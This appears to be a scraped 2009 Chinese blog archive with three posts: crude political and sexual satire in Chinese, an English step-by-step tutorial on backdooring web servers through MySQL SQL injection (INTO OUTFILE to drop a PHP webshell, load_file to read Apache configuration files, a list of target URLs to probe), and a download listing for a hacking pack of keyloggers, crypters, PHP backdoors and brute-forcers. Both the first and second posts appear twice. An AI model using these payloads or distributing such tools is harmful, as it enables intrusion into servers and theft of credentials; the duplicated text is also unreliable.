2009年10月23日星期五
话糙理不糙 做人 真好 思想 有多远 就 折腾 多远
有些人,话糙理不糙;有些人,话不糙人有些人,话糙理不糙;有些人,话不糙人糙
啥时候国产电影里一口一口的逼,就跟美国片里一口一口的fuck那样,就说明咱们自由了。
梁丽婉因房子被强拆而上访,当地政府想收买她,对她说:“你去拆迁办上班,一年也能弄几十万。”梁梁丽婉说:“这是断子绝孙的工作,我就是讨饭也不做这种工作。”
悲剧是你被操了,喜剧是你还买单。
希特勒曾经对戈培尔说:“不需要让青少年有判断力和批判力。给他们摩托车、明星、刺激音乐和流行服饰就够了。剥夺思考,根植对命令的服从心才是上策。”
娱乐
当年周迅说,我非大齐不嫁;当年刘烨说,我非谢娜不娶。我现在只能祝福一下孙俪和邓超了。
到处MJ的报道。个人比较喜欢南方人物周刊的标题:“半个世纪的孤独”。
两性
情侣是不怕热的,大夏天也可以紧紧抱在一起在床上滚来滚去,这使我明白了热恋的真正的含义。
当一个城市与这个城市的女人风格一致或相似时,要么这个城市美到极致,要么这个城市不可救药。
每个女孩都希望自己的人生能像韩国电视剧,自己就是韩剧女主角。但事实是,除了那些得绝症的不幸会吻合,其他时候都是国产大片——贫嘴张大民的幸福生活。
所谓爱情,就是找到一个能进行满意性交的挚友,与其共同享受肉体交流和思想交流所带来的快感。
《绝望的主妇》第一集就有这样的台词:“男人勃起的时候是没有道德可言的。”
女人要成长,要先爱上一个混蛋,然后吃过亏。然后才会明白人生不是偶像剧,而父母说太多的道理,比不上吃一个亏来得经验多。
社会
中国人的勇敢表现在:先上,不行再撤下来。改革开放、股市、互联网、任命官员、油价、球场换人无不遵循这一原则。
所有的崇拜、憎恨、喜、怒、哀、乐,都源于信息不对称,谁掌握了信息,谁就能操控情绪,操控人心。
我们有雪亮的眼睛却永远搞不明真相。你是侮辱我的眼睛还是侮辱我的智商?
街边儿的美女终于上了一辆宝马,于是我松了一口气,还好……这个世界还是正常的。
刚才和几个法律专业毕业但从事其他行业的同事闲聊故意杀人、过失杀人、故意伤害等等的区别,关于如何界定大家正讨论得不可开交的时候,真正的法务部同事恰巧经过,义正言辞斩钉截铁地说了一句:“那要看我党的意思!”然后扬长而去。瞧瞧!这就是业余和专业的差距所在!
看到成都把公交遇难人员定为凶手,上海方面非常羡慕,他们多么想说,那幢楼是被那个遇难工人推倒的。
人家有的是背景,我有的只是背影;人家有的是身份,我有的只是身份证。
和老婆解释了一下今年快女为什么那么差,这就是普选和人民代表大会制度的差距。
世界
面对百年一遇的经济危机,朝鲜最大宗出口商品导弹严重积压,带来极大存储成本,为去库存化,朝鲜决定不断向海上倾倒导弹,学习以美国为首的资本主义、帝国主义国家奶农倾倒牛奶,以平衡供需。
日本在性交方法这一领域做出了杰出的贡献,中国在死亡方式这一领域同样拥有不少匪夷所思的创造。
社会都是在不停变化的,君不见曾经的小泽玛利亚,现在也无码,内射了——金融危机的影响多大啊!
每年的独立日这一天,都有很多美国人自发的走上街头,唱歌跳舞,或看烟火,庆祝自己的节日,没有“组织”,没有“安排”,没有“强制”,是完全自愿的!若是有的国家用强制或收买的手段使国民庆祝节日,只能说明这个国家已经到了非常可悲的地步。
思想
有时候我们就像只宠物狗,在冲着社会狂哮的同时,脖子上还被拴着一根狗链。
有些人永远都比别人成熟,自宫后再拼命阉割别人。
人是很难和大便斗的,你踩它打它可它依然是大便,弄脏的是你。
“共产党万岁,我要积极向党组织靠拢!”——这话看似涉世未深,其实早已洞察世事。
《女人逢8岁》
女人8岁,你要编故事哄她睡,18岁你要编故事骗她和你睡,28岁不用故事就和你睡,38岁她会编故事骗你和她睡,48岁你要编故事不和她睡。
◎ 阿忆是头闯进央视这个瓷器店的大象。(连岳)
◎ 暗恋是一个人的奸情,暧昧是两个人的借口。(open任意门)
◎ 曾经我们是祖国的花朵,茁壮成长;如今我们是祖国的红杏,集体翻墙。(赖宝)
◎ 处女膜消失的时候还有疼痛感,而纯真丢失的时候你全然不知。(王小峰)
◎ 此消息已删除或不公开(aiweiwei)
◎ 从前有个绿爸,他知道所有的黄色网站。(拿铁匠)
◎ 对不起,您拨打的老公已外遇。(赖宝)
◎ 好的女秘书和很好的女秘书之间的区别是什么?早晨, 好的女秘书说, “早晨好!老板。” 很好的女秘书: “已经早晨了!老板。”( 陈晓卿)
◎ 黑夜给我黑色的眼睛,我却用它寻找光明楼——求租光明楼两室一厅(大仙)
◎ 杰克逊走了,希望再投胎时,他能选择肤色,我们能选择祖国。(B.Kaoru)
◎ 路遥知马力不足,日久见人心叵测。(非非)
◎ 绿坝产自红墙。(东东枪)
◎ 面对外界批评质疑,周森锋要求媒体给他一个不受干扰的成长环境……这孩子说起话来怎么跟自己是麦当娜儿子似的。(DuFake)
◎ 拍死的是蚊子,流血的是老子!(张冠仁猴太岁)
◎ 人生五十如梦幻,岂有长生不死者(和菜头)
◎ 上黄网还用穿墙?不是有百度吗?(摸索你的灵魂)
◎ 食言有助减肥,只要不是荤话。(拿铁匠)
◎ 我以为春哥是李长春呢(梁文道)
◎ 悟空,快变成安全套,为师今天要亲自收拾这女妖精!(pizzzzz)
◎ 丫的!有种往人脑里安芯片啊!(fantasy.z)
◎ 用吃肥肉表示减肥的决心?用嫖娼以示贞洁?(莫之许)
◎ 用一块钱把版权卖给央视,成为娱乐头条;和一群IT精英做华山论剑,成为IT头条;在浙江大学担任博士生导师,成为教育头条;对往昔作品进行大量删改订正,成为文化头条;以八十之身前往剑桥大学读书,成为笑话头条……今天,金庸主动加入中国作家协会,天下大哗……金庸真是“头条大师”啊!( 饭友+KAKA)
◎ 有毛的鸡蛋就叫猕猴桃(Bearis)
◎ 再牛逼的肖邦也弹不出我的忧伤,再傻逼的姑娘也不要对她张狂(肉加磨)
◎ 怎么才能设置禁止某个傻逼跟我说话? (罗永浩)
◎ 中南海有害身体健康。可我还是想抽它。(MissISSUE)
糙
啥时候国产电影里一口一口的逼,就跟美国片里一口一口的fuck那样,就说明咱们自由了。
梁丽婉因房子被强拆而上访,当地政府想收买她,对她说:“你去拆迁办上班,一年也能弄几十万。”梁梁丽婉说:“这是断子绝孙的工作,我就是讨饭也不做这种工作。”
悲剧是你被操了,喜剧是你还买单。
希特勒曾经对戈培尔说:“不需要让青少年有判断力和批判力。给他们摩托车、明星、刺激音乐和流行服饰就够了。剥夺思考,根植对命令的服从心才是上策。”
娱乐
当年周迅说,我非大齐不嫁;当年刘烨说,我非谢娜不娶。我现在只能祝福一下孙俪和邓超了。
到处MJ的报道。个人比较喜欢南方人物周刊的标题:“半个世纪的孤独”。
两性
情侣是不怕热的,大夏天也可以紧紧抱在一起在床上滚来滚去,这使我明白了热恋的真正的含义。
当一个城市与这个城市的女人风格一致或相似时,要么这个城市美到极致,要么这个城市不可救药。
每个女孩都希望自己的人生能像韩国电视剧,自己就是韩剧女主角。但事实是,除了那些得绝症的不幸会吻合,其他时候都是国产大片——贫嘴张大民的幸福生活。
所谓爱情,就是找到一个能进行满意性交的挚友,与其共同享受肉体交流和思想交流所带来的快感。
《绝望的主妇》第一集就有这样的台词:“男人勃起的时候是没有道德可言的。”
女人要成长,要先爱上一个混蛋,然后吃过亏。然后才会明白人生不是偶像剧,而父母说太多的道理,比不上吃一个亏来得经验多。
社会
中国人的勇敢表现在:先上,不行再撤下来。改革开放、股市、互联网、任命官员、油价、球场换人无不遵循这一原则。
所有的崇拜、憎恨、喜、怒、哀、乐,都源于信息不对称,谁掌握了信息,谁就能操控情绪,操控人心。
我们有雪亮的眼睛却永远搞不明真相。你是侮辱我的眼睛还是侮辱我的智商?
街边儿的美女终于上了一辆宝马,于是我松了一口气,还好……这个世界还是正常的。
刚才和几个法律专业毕业但从事其他行业的同事闲聊故意杀人、过失杀人、故意伤害等等的区别,关于如何界定大家正讨论得不可开交的时候,真正的法务部同事恰巧经过,义正言辞斩钉截铁地说了一句:“那要看我党的意思!”然后扬长而去。瞧瞧!这就是业余和专业的差距所在!
看到成都把公交遇难人员定为凶手,上海方面非常羡慕,他们多么想说,那幢楼是被那个遇难工人推倒的。
人家有的是背景,我有的只是背影;人家有的是身份,我有的只是身份证。
和老婆解释了一下今年快女为什么那么差,这就是普选和人民代表大会制度的差距。
世界
面对百年一遇的经济危机,朝鲜最大宗出口商品导弹严重积压,带来极大存储成本,为去库存化,朝鲜决定不断向海上倾倒导弹,学习以美国为首的资本主义、帝国主义国家奶农倾倒牛奶,以平衡供需。
日本在性交方法这一领域做出了杰出的贡献,中国在死亡方式这一领域同样拥有不少匪夷所思的创造。
社会都是在不停变化的,君不见曾经的小泽玛利亚,现在也无码,内射了——金融危机的影响多大啊!
每年的独立日这一天,都有很多美国人自发的走上街头,唱歌跳舞,或看烟火,庆祝自己的节日,没有“组织”,没有“安排”,没有“强制”,是完全自愿的!若是有的国家用强制或收买的手段使国民庆祝节日,只能说明这个国家已经到了非常可悲的地步。
思想
有时候我们就像只宠物狗,在冲着社会狂哮的同时,脖子上还被拴着一根狗链。
有些人永远都比别人成熟,自宫后再拼命阉割别人。
人是很难和大便斗的,你踩它打它可它依然是大便,弄脏的是你。
“共产党万岁,我要积极向党组织靠拢!”——这话看似涉世未深,其实早已洞察世事。
《女人逢8岁》
女人8岁,你要编故事哄她睡,18岁你要编故事骗她和你睡,28岁不用故事就和你睡,38岁她会编故事骗你和她睡,48岁你要编故事不和她睡。
◎ 阿忆是头闯进央视这个瓷器店的大象。(连岳)
◎ 暗恋是一个人的奸情,暧昧是两个人的借口。(open任意门)
◎ 曾经我们是祖国的花朵,茁壮成长;如今我们是祖国的红杏,集体翻墙。(赖宝)
◎ 处女膜消失的时候还有疼痛感,而纯真丢失的时候你全然不知。(王小峰)
◎ 此消息已删除或不公开(aiweiwei)
◎ 从前有个绿爸,他知道所有的黄色网站。(拿铁匠)
◎ 对不起,您拨打的老公已外遇。(赖宝)
◎ 好的女秘书和很好的女秘书之间的区别是什么?早晨, 好的女秘书说, “早晨好!老板。” 很好的女秘书: “已经早晨了!老板。”( 陈晓卿)
◎ 黑夜给我黑色的眼睛,我却用它寻找光明楼——求租光明楼两室一厅(大仙)
◎ 杰克逊走了,希望再投胎时,他能选择肤色,我们能选择祖国。(B.Kaoru)
◎ 路遥知马力不足,日久见人心叵测。(非非)
◎ 绿坝产自红墙。(东东枪)
◎ 面对外界批评质疑,周森锋要求媒体给他一个不受干扰的成长环境……这孩子说起话来怎么跟自己是麦当娜儿子似的。(DuFake)
◎ 拍死的是蚊子,流血的是老子!(张冠仁猴太岁)
◎ 人生五十如梦幻,岂有长生不死者(和菜头)
◎ 上黄网还用穿墙?不是有百度吗?(摸索你的灵魂)
◎ 食言有助减肥,只要不是荤话。(拿铁匠)
◎ 我以为春哥是李长春呢(梁文道)
◎ 悟空,快变成安全套,为师今天要亲自收拾这女妖精!(pizzzzz)
◎ 丫的!有种往人脑里安芯片啊!(fantasy.z)
◎ 用吃肥肉表示减肥的决心?用嫖娼以示贞洁?(莫之许)
◎ 用一块钱把版权卖给央视,成为娱乐头条;和一群IT精英做华山论剑,成为IT头条;在浙江大学担任博士生导师,成为教育头条;对往昔作品进行大量删改订正,成为文化头条;以八十之身前往剑桥大学读书,成为笑话头条……今天,金庸主动加入中国作家协会,天下大哗……金庸真是“头条大师”啊!( 饭友+KAKA)
◎ 有毛的鸡蛋就叫猕猴桃(Bearis)
◎ 再牛逼的肖邦也弹不出我的忧伤,再傻逼的姑娘也不要对她张狂(肉加磨)
◎ 怎么才能设置禁止某个傻逼跟我说话? (罗永浩)
◎ 中南海有害身体健康。可我还是想抽它。(MissISSUE)
糙
2009年10月19日星期一
Backdoor webserver using MySQL SQL Injection
Backdoor webserver using MySQL SQL Injection
MySQL Database is a great product used by thousand of websites. Various web applications use MySQL as their default database. Some of these applications are written with security in mind, and some are not. In this article, I would like to show you how you can exploit SQL injection in order to gain almost full control over your webserver.
Most people know that SQL injection allows attackers to retrieve database records, pass login screens, change database content, through the creation of new administrative users. MySQL does not have a built-in command to execute shell commands, like Microsoft SQL server. I will show you how to run arbitrary commands using standard features provided by MySQL.
First of all, I would like to give a brief description of SQL injection, then I would like to present you with a couple less known methods that exist in MySQL, which I will use to backdoor a webserver. I will use 2 built-in MySQL commands - one that writes arbitrary files and the one that can be used to read arbitrary files. After that I will describe webshells and go to the attack itself.
What is SQL Injection?
SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.
For example, the following SQL command is used to validate user login requests:
$sql_query = "select * from users where user='$user' and password='$pass'"
If the user-submitted data is not properly validated, an attacker can exploit this query and pass the login screen by simply submitting specially crafter variables. For example, attacker can submit the following data as a $user variable: admin' or '1'='1 . When this $user variable is glued together with the query, it will look as followed:
$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'"
Now, the attacker can safely pass the login screen because or '1'='1' causes the query to always return a "true" value while ignoring the password value.
Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files
MySQL has a built-in command that can be used to create and write system files. This command has the following format:
mysq> select "text" INTO OUTFILE "file.txt"
One big drawback of this command is that it can be appended to an existing query using UNION SQL token.
For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'
Resulting query:
select user, password from user where user="admin" and password='123' union
select "text",2 into outfile "/tmp/file.txt" -- '
As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files
MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.
mysql> select load_file("PATH_TO_FILE");
Webshell
Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands.
Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):
For example, in the following screenshot, id command is executed.
Webshell - id command
Attack Scenario
1. Find SQL injection
It is out of the scope of this document. You must first find SQL injection.
2. Find a directory with write permission
To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:
hxxp://www.target.com/templates_compiled/
hxxp://www.target.com/templates_c/
hxxp://www.target.com/templates/
hxxp://www.target.com/temporary/
hxxp://www.target.com/images/
hxxp://www.target.com/cache/
hxxp://www.target.com/temp/
hxxp://www.target.com/files/
In our example we will use a temp directory.
3. Exploit SQL injection - create web shell
You need to append the following string to the legitimate SQL command:
UNION SELECT "",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:
2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
/var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
temp is a directory with full write access. In your case it could be a different directory.
The above command will write the query's result with the "" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!
4. Execute shell commands
Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:
hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND
For example:
hxxp://www.target.com/temp/c.php?cmd=id
Plan B
In case you failed to create a PHP file due to a wrong path, there are a number of workarounds:
1. Generate PHP errors.
You need to create a situation when a PHP script will fail and the full disk path will be printed in the error message. You can play with page parameters to make this happen.
2. Find the file that will print phpinfo().
In some cases you will be lucky and you will get a phpinfo() function executed. This function prints a wealth of PHP internal information including the current directory location.
Try to access the following urls:
hxxp://www.target.com/phpinfo.php
hxxp://www.target.com/test.php
hxxp://www.target.com/info.php
3. Look for a default web directory location.
You need to get a default web directory location for a web server. Check the following page since it has a big list of default Apache configurations that are used in different distributions.
http://wiki.apache.org/httpd/DistrosDefaultLayout
4. Read the Apache configuration files.
MySQL has a built-in command that allows the attacker to read arbitrary files. We can exploit this command to read Apache configuration files and study directory structures. Simply use the load_file() MySQL function.
For example (SQL query after injection):
select user, password from user where user="admin123" and password='123' UNION select load_file("/etc/apache2/apache2.conf"), 2 -- '
Note:
You can find a location of Apache configurations at this resource:
http://wiki.apache.org/httpd/DistrosDefaultLayout
Limitation
In order to allow the above to work, the MySQL user used by this application must have a FILE permission. For example by default, a "root" user has this permission on. FILE is an administrative privilege that can only be granted globally (using ON *.* syntax).
For example, if the MySQL user was created using the following command, the user will have this FILE permission on.
GRANT ALL PERMISSIONS to *.* to 'USER_NAME'@'HOST_NAME' IDENTIFIED BY 'PASSWORD'
Countermeasures
1. Install the GreenSQL database firewall.
GreenSQL is an open source database firewall that can automatically block the commands described above: load_file and INTO OUTFILE. By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with high risk. For example , UNION token and SQL comments are taken into account. Check the application website for more information http://www.greensql.net/
2. Do not use MySQL root user to access the database.
Do not use administrative users to access the database. It is recommended to create a distinct user with hardened permissions to access specific databases.
3. Revoke FILE permission from the MySQL user used in your applications.
mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';
4. Application code review.
Ensure that your application does not have any SQL injections and that the code is updated.
Links
1. MySQL Injection Cheat Sheet
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
2. SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
3. MySQL Documentation
http://dev.mysql.com/doc/
MySQL Database is a great product used by thousand of websites. Various web applications use MySQL as their default database. Some of these applications are written with security in mind, and some are not. In this article, I would like to show you how you can exploit SQL injection in order to gain almost full control over your webserver.
Most people know that SQL injection allows attackers to retrieve database records, pass login screens, change database content, through the creation of new administrative users. MySQL does not have a built-in command to execute shell commands, like Microsoft SQL server. I will show you how to run arbitrary commands using standard features provided by MySQL.
First of all, I would like to give a brief description of SQL injection, then I would like to present you with a couple less known methods that exist in MySQL, which I will use to backdoor a webserver. I will use 2 built-in MySQL commands - one that writes arbitrary files and the one that can be used to read arbitrary files. After that I will describe webshells and go to the attack itself.
What is SQL Injection?
SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.
For example, the following SQL command is used to validate user login requests:
$sql_query = "select * from users where user='$user' and password='$pass'"
If the user-submitted data is not properly validated, an attacker can exploit this query and pass the login screen by simply submitting specially crafter variables. For example, attacker can submit the following data as a $user variable: admin' or '1'='1 . When this $user variable is glued together with the query, it will look as followed:
$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'"
Now, the attacker can safely pass the login screen because or '1'='1' causes the query to always return a "true" value while ignoring the password value.
Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files
MySQL has a built-in command that can be used to create and write system files. This command has the following format:
mysq> select "text" INTO OUTFILE "file.txt"
One big drawback of this command is that it can be appended to an existing query using UNION SQL token.
For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'
Resulting query:
select user, password from user where user="admin" and password='123' union
select "text",2 into outfile "/tmp/file.txt" -- '
As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files
MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.
mysql> select load_file("PATH_TO_FILE");
Webshell
Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands.
Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):
For example, in the following screenshot, id command is executed.
Webshell - id command
Attack Scenario
1. Find SQL injection
It is out of the scope of this document. You must first find SQL injection.
2. Find a directory with write permission
To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:
hxxp://www.target.com/templates_compiled/
hxxp://www.target.com/templates_c/
hxxp://www.target.com/templates/
hxxp://www.target.com/temporary/
hxxp://www.target.com/images/
hxxp://www.target.com/cache/
hxxp://www.target.com/temp/
hxxp://www.target.com/files/
In our example we will use a temp directory.
3. Exploit SQL injection - create web shell
You need to append the following string to the legitimate SQL command:
UNION SELECT "",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:
2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
/var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
temp is a directory with full write access. In your case it could be a different directory.
The above command will write the query's result with the "" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!
4. Execute shell commands
Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:
hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND
For example:
hxxp://www.target.com/temp/c.php?cmd=id
Plan B
In case you failed to create a PHP file due to a wrong path, there are a number of workarounds:
1. Generate PHP errors.
You need to create a situation when a PHP script will fail and the full disk path will be printed in the error message. You can play with page parameters to make this happen.
2. Find the file that will print phpinfo().
In some cases you will be lucky and you will get a phpinfo() function executed. This function prints a wealth of PHP internal information including the current directory location.
Try to access the following urls:
hxxp://www.target.com/phpinfo.php
hxxp://www.target.com/test.php
hxxp://www.target.com/info.php
3. Look for a default web directory location.
You need to get a default web directory location for a web server. Check the following page since it has a big list of default Apache configurations that are used in different distributions.
http://wiki.apache.org/httpd/DistrosDefaultLayout
4. Read the Apache configuration files.
MySQL has a built-in command that allows the attacker to read arbitrary files. We can exploit this command to read Apache configuration files and study directory structures. Simply use the load_file() MySQL function.
For example (SQL query after injection):
select user, password from user where user="admin123" and password='123' UNION select load_file("/etc/apache2/apache2.conf"), 2 -- '
Note:
You can find a location of Apache configurations at this resource:
http://wiki.apache.org/httpd/DistrosDefaultLayout
Limitation
In order to allow the above to work, the MySQL user used by this application must have a FILE permission. For example by default, a "root" user has this permission on. FILE is an administrative privilege that can only be granted globally (using ON *.* syntax).
For example, if the MySQL user was created using the following command, the user will have this FILE permission on.
GRANT ALL PERMISSIONS to *.* to 'USER_NAME'@'HOST_NAME' IDENTIFIED BY 'PASSWORD'
Countermeasures
1. Install the GreenSQL database firewall.
GreenSQL is an open source database firewall that can automatically block the commands described above: load_file and INTO OUTFILE. By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with high risk. For example , UNION token and SQL comments are taken into account. Check the application website for more information http://www.greensql.net/
2. Do not use MySQL root user to access the database.
Do not use administrative users to access the database. It is recommended to create a distinct user with hardened permissions to access specific databases.
3. Revoke FILE permission from the MySQL user used in your applications.
mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';
4. Application code review.
Ensure that your application does not have any SQL injections and that the code is updated.
Links
1. MySQL Injection Cheat Sheet
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
2. SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
3. MySQL Documentation
http://dev.mysql.com/doc/
2009年10月18日星期日
Big List Of Hacking Tools 2009 北美2009年黑客软件工具箱
Big List Of Hacking Tools 2009 北美2009年黑客软件工具箱
http://rapidshare.com/files/207537656/thefeliksbighackpack.zip.001.html
http://rapidshare.com/files/207538394/thefeliksbighackpack.zip.002.html
http://rapidshare.com/files/207537897/thefeliksbighackpack.zip.003.html
Feliks Hack Pack 2 AIO
+---FeliksPack2 - AIOs
| +---AIO Ip Tools
| | aio1pt00ls.rar
| |
| +---AIO password Recovery
| | Password_Recovery_Utilities_AIO.rar
| |
| +---AntiSchoolKit
| | antischoolkkit.zip
| |
| \---Tracing pack AIO
| ecartoia_pass.thijs.rar
|
+---FeliksPack2 - Binders
| 4m0kjoin3r.zip
| aase_-_crypter_binder.rar
| AFX Executable Binder PRO.zip
| aspack21.zip
| Binder v2.1.rar
| brutal.zip
| brutalforce.zip
| bytesadder.zip
| coolbind22.zip
| daecr2pub.zip
| Daemon Crypt Public v2.zip
| Deception v4.0.rar
| Deception4.zip
| EESBinder.zip
| EESBinder10.zip
| Exe Binder 07.zip
| F.B.I - Binder.rar
| freshbind.zip
| fsg_v2.zip
| interlacedbinder.zip
| M3Byter.zip
| mj17.zip
| MultiBinder_v1.4.1.zip
| newjoin.zip
| nkedb.zip
| nkedbindv10.zip
| NTPacker.zip
| NTPackerV21.zip
| Pretator v1.6.rar
| Pretator_v1.6.zip
| Redbinder_v_2.0.1.rar
| SBinder.zip
| scrambletool02.zip
| TAOD.rar
| upx.zip
| y4b_blnd.zip
|
+---FeliksPack2 - Bluetooth
| Blooover.jar
| Blooover2b.jar
| bluealert.zip
| BlueAuditor.zip
| bluescanner.zip
| BlueScannerSetup_1_1_1_0.exe
| bluesweep.zip
| bluetest.zip
| btbrowser.jar
| btbrowser.zip
| btcrack.zip
| BTExplorerPL.jar
| btscanner.zip
| EasyJackv2.jar
| freejack.jar
| ftp_bt_105.jar
| ftp_bt_106.jar
| ISeeYourFiles.jar
| MiyuX.jar
| mobiluck.jar
|
+---FeliksPack2 - Bruteforce
| 1-Attack Tool kit.zip
| 1-Crack*****2.0.zip
| brutus.zip
| Crackftp.zip
| E-mail Cracker.rar
| E-mail Cracker.zip
| FTP Brute Forcer.rar
| ftpbr.zip
| ftpbrut.zip
| hackersutility.zip
| phpbb bruteforcer.rar
| PhpBB pass extractor.zip
| phpBBcracker.rar
| ShadowScan.zip
| Webcrack.zip
| WebCrackv4.0.zip
| wwwh4ckv1946.zip
| wwwhack.zip
|
+---FeliksPack2 - Google hacking
| Alt-Google.rar
| DaGoogler.zip
| Extreme Searching Guide.txt
| Google Hacker 1.2.zip
| googler.zip
| google_hacker.zip
| GooLink.rar
| GooLink.zip
| SimpleGoogle_bin.rar
| t3chn0bra1n_z_Googler.zip
|
+---FeliksPack2 - Keyloggers
| 1-elitekeylogger.zip
| 5-BFK (Best Free Keylogger).zip
| 5-power spy.zip
| aplus.zip
| Ardamax.Keylogger.v2.8.rar
| ardamaxl.zip
| bfk.zip
| Curiosity.zip
| egf1.0b.zip
| elitek3yl0gg3r10.zip
| elitekeylogger1.0.zip
| ESK.zip
| fks20.zip
| fks_2.0.zip.zip
| GloG.rar
| Golden eye 2005.zip
| goldeneye2005setup.zip
| HermanAgent.zip
| IKlogger0.1.rar
| IKlogger0.1.rar.zip
| k3yl0g3r.zip
| keylogerSpy2006.zip
| powerspy.zip
| ProjectSatan20.zip
| rpkeylogger-0.1.zip
| skl01.zip
| SKLEditor1.0.zip
| WickeD_Keylogger 1.0.1.zip
|
+---FeliksPack2 - Links
| bg2.jpg
| the_feliks_links.html
|
+---FeliksPack2 - MSN
| 2-A-IMessengerPasswoRd.zip
| HotFreeze 1.6.zip
| icecold_reloaded freezer.zip
| MesDiscoveryLive_110155.zip
| MSN Messenger Account Cracker v2.0.zip
| MSN Monitor & Sniffer.zip
| msnexte3.zip
| mspass.zip
| NetPass.zip
| nudgemadness.zip
| WWH Flooder 2.0.zip
|
+---FeliksPack2 - Nukers
| b4ttl3p0ng.zip
| fortune.zip
| inf3rn0_nk.zip
| meliskah25.zip
| nuk3it.zip
| PM2.zip
| RocketV1_0.zip
| Sphinx20.zip
| Superkod.zip
| Winsmurf.zip
|
+---FeliksPack2 - Otherz
| CeedoInstaller.exe
| pebuilder3110a.exe
|
+---FeliksPack2 - Passwd crackers
| 2-Advanced archive password recovery.zip
| 3-A-PDF-PRP.ZIP
| 3-AOfficePasswordRecovery.zip
| 3-PDF password Remover v2.2.zip
| apocalypso.zip
| hydra-4.6-src.tar.tar
| john-17w.zip
| md5_cracker.rar
| mdcrack-1.2.tar.tar
| rainbowcrack-1.2-win.zip
| Ultra Zip password Cracker.zip
|
+---FeliksPack2 - PHP Shells
| BackDooR (fr).rar
| c99last.tar.gz
| Defacing Tool Pro v2.5.rar
| nstviewshell.rar
| PHP Backdoor v1.rar
| PHP_BackDoor_v1.5.rar
| PHP_Shell_v1.7.rar
| r57shell.rar
| Simple_PHP_BackDooR.rar
|
+---FeliksPack2 - Portable Notepads
| beauty.exe
| DIPRO32.EXE
| gsnote3.exe
| htmlpad.exe
| metapad.exe
| notepad++.exe
|
+---FeliksPack2 - Portscanners
| 1-SuperScan 2.06.zip
| 1-SuperScan 4.zip
| 134_superscan4.zip
| angryipscan.zip
| aolip.zip
| bitchinthreads.zip
| blue.zip
| bluesprtscn.zip
| CGI Founder v1.043.zip
| cgis4.zip
| CGISscan.zip
| domainscanv1_0or.zip
| lanspy.zip
| Legion NetBios Scanner v2.1.zip
| MooreR Port Scanner.rar
| neotrc325.zip
| NetBIOS Name Scanner.rar
| netscantools4or.zip
| nmap-4.03.tar.bz2
| nts.zip
| ProPort.zip
| Stealth - HTTP Scanner v1.0 build 23.zip
| sup3rsc4n.zip
| super.zip
| superscan4.zip
| TrojanHunter15.zip
| wasp.zip
|
+---FeliksPack2 - Rapid
| Rapid.rar
|
+---FeliksPack2 - ReMade
| +---AC
| | \---ACStripper
| | ACRebuilder.exe
| | ACStripper.exe
| |
| +---AS
| | +---ASPackDie
| | | ASPackDie.exe
| | | ForceLibrary.dll
| | |
| | \---AStripper
| | Engine.sys
| | Stripper X.exe
| |
| +---DBPE
| | \---DBPE Unpacker
| | DBPE Unpacker.exe
| |
| +---FSG
| | \---UnFSG
| | FSG Dumper.exe
| | UnFSG.exe
| |
| +---MEW
| | \---UnMEW
| | UnMEW.exe
| |
| +---PE
| | +---PESpin
| | | PESpin.EXE
| | |
| | +---UnPECompact
| | | Realign.dll
| | | rebIT.dll
| | | UnPECompact 2.EXE
| | | UnPECompact.exe
| | |
| | \---unPEncrypt
| | unPEncrypt.exe
| |
| +---PEiD
| | | external.txt
| | | IDToText.Ini
| | | PEiD.exe
| | | userdb.txt
| | |
| | +---plugins
| | | AddSig.DLL
| | | ExtOverlay.dll
| | | FC.DLL
| | | FixCrc.dll
| | | GenOEP.dll
| | | IDToText.DLL
| | | ImpREC.dll
| | | kanal.dll
| | | Morphine.dll
